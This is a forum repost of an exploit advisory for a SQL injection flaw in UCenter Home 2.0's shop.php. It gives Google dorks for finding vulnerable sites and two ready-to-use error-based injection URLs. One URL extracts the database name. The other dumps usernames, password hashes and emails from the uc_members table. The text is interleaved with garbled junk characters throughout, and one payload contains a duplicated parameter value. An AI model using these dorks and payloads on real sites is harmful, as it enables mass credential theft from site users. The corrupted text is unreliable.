& [' f! N, c6 V8 R$ Y a3 i
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
7 H0 s, h$ b% |0 v4 T4 |. o% j& M g7 |0 S
0 S8 ~6 Q3 ~* w) G& T1 _* M
/ N" D# d; Z- d( Q2 n* i: L0 h! V, A9 R0 z4 z i6 e: s4 ?
*/ Author : KnocKout
: `6 C1 H2 ?$ b' u' A' S
3 b% K; f! Y2 c) Y. L3 W' }*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& s8 Y1 f& w5 _2 K _$ e8 M9 {# z& J& B
*/ Contact: knockoutr@msn.com ) b4 H- K7 A& G" @- T
$ X. E7 u0 @0 ~; _4 v' i
*/ Cyber-Warrior.org/CWKnocKout ( X! O& k5 O% j2 X
: R" W, Q9 a8 u4 ]/ m) |$ x, m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 i [, d$ j' s! P' B/ S2 b
9 t1 x) u7 d7 U$ p% G1 hScript : UCenter Home 9 n2 C8 e7 ]. B. T! y, u& h7 R
2 s5 f* Q* i# m
Version : 2.0 0 J2 y4 W1 A. J( [* n
8 @/ M2 {1 b" s1 aScript HomePage : http://u.discuz.net/ 1 W. l3 l. g" O
6 y8 N2 J+ y5 s__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 ~. h8 V8 V& N/ S' s1 m. z1 O+ s! }" D# w
Dork : Powered by UCenter inurl:shop.php?ac=view / @0 m) R P# O. o7 U: p
# B, Z8 w2 M7 [
Dork 2 : inurl:shop.php?ac=view&shopid= ' _* w; _ a9 J7 I5 ?) m
" F! I' J' u9 c' D- _$ d__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( i$ C& e: E# }1 y; f( u! W$ G3 M& d5 }" @
Vuln file : Shop.php
& g3 \+ K4 N8 d( G- X$ O, A% E7 _! G* Y9 L. N
value's : (?)ac=view&shopid=
8 k5 A& o6 L4 y4 l1 c6 B" T! W0 t$ `
Vulnerable Style : SQL Injection (MySQL Error Based)
7 V; H+ q' n* K; [) `
" o( M6 E! V( o) D gNeed Metarials : Hex Conversion
. L0 T$ s$ }7 Q5 w% E+ _* N) \' ?# z; l" t8 d& u- W; v. W
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ) q( L! y! y/ Q; }5 }: Y, E
+ c; o# u: H# \7 X! Q7 tYour Need victim Database name.
2 J3 f( U! A" o" k9 U+ |1 ?; r: v6 a. [3 f3 b" t+ t9 g; j. P1 ?
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 Z" M: [+ ?; s/ `( i5 j* W
2 \; S" V1 p- [) E# E2 ]3 y
.. % y$ d2 u: K, H# m- G
# k% C! k% U- i+ g% D( u0 {DB : Okey. 5 Z) O. V2 U0 d, \
3 @* H2 ~' S) ^$ z. {
your edit DB `[TARGET DB NAME]` 8 P" A) X9 P9 S
J" `6 }- q3 Y6 n) X
Example : 'hiwir1_ucenter' 0 Z% e$ g0 `! X0 ?% {; ?( j7 s; k
0 T+ N* l o3 r4 Z
Edit : Okey. 2 l3 d' r( L- ^" A) p+ b
2 \5 c4 P' k/ ] H
Your use Hex conversion. And edit Your SQL Injection Exploit..
K0 N4 z$ T: J2 R8 h2 J! k1 c) G( W' G
( H0 q! H0 g% s& q5 U0 m$ j" i/ X, Z* b) J
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
, U* U. W# X0 A; ^) Q& X |
发表于 2013-2-27 21:31:31
收藏
支持
反对